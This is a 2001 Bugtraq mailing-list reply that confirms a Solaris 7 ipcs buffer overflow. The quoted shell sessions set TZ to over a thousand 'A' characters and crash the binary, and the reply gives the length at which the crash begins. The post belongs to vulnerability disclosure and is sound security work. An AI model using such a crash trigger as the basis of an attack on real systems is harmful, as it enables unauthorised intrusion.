[20262] in bugtraq
Re: Solaris ipcs vulnerability
daemon@ATHENA.MIT.EDU (Robert G. Ferrell)
Tue Apr 17 13:24:21 2001
MIME-Version: 1.0
Content-Type: TEXT/plain; charset=us-ascii
Content-MD5: 0GyY8L/7sADj4woAQ6ht4g==
Message-ID: <200104171226.HAA25156@rgfsparc.cr.usgs.gov>
Date: Tue, 17 Apr 2001 07:26:16 -0500
Reply-To: "Robert G. Ferrell" <root@rgfsparc.cr.usgs.gov>
From: "Robert G. Ferrell" <root@rgfsparc.cr.usgs.gov>
To: BUGTRAQ@SECURITYFOCUS.COM
>PLATFORM>> solaris 2.7/SPARC
>
><----snip---->
>$ uname -a
>SunOS <host> 5.7 Generic_106541-14 sun4u sparc
>$
>$ TZ=`/usr/local/bin/perl -e 'print "A"x2048'`
>$
>$ /bin/ipcs
>Segmentation Fault
>$
>$ /usr/bin/sparcv7/ipcs
>/usr/bin/sparcv7/ipcs: /dev/ksyms is not a 32-bit kernel namelist
>$
>$ /usr/bin/sparcv9/ipcs
>Segmentation Fault
Same behavior on my box:
# uname -a
SunOS <host> 5.7 Generic_106541-10 sun4u sparc SUNW,Ultra-5_10
#
# TZ=`perl -e 'print "A"x2048'`
#
# /bin/ipcs
Segmentation Fault
#
# /usr/bin/sparcv7/ipcs
/usr/bin/sparcv7/ipcs: /dev/ksyms is not a 32-bit kernel namelist
#
# /usr/bin/sparcv9/ipcs
Segmentation Fault
Anything above 1198 "A's" seg faults /bin/ipcs and /usr/bin/sparcv9/ipcs.
Cheers,
RGF
Robert G. Ferrell, CISSP
Information Systems Security Officer
National Business Center
U. S. Dept. of the Interior
Robert_G_Ferrell@nbc.gov
========================================
Who goeth without humor goeth unarmed.
========================================
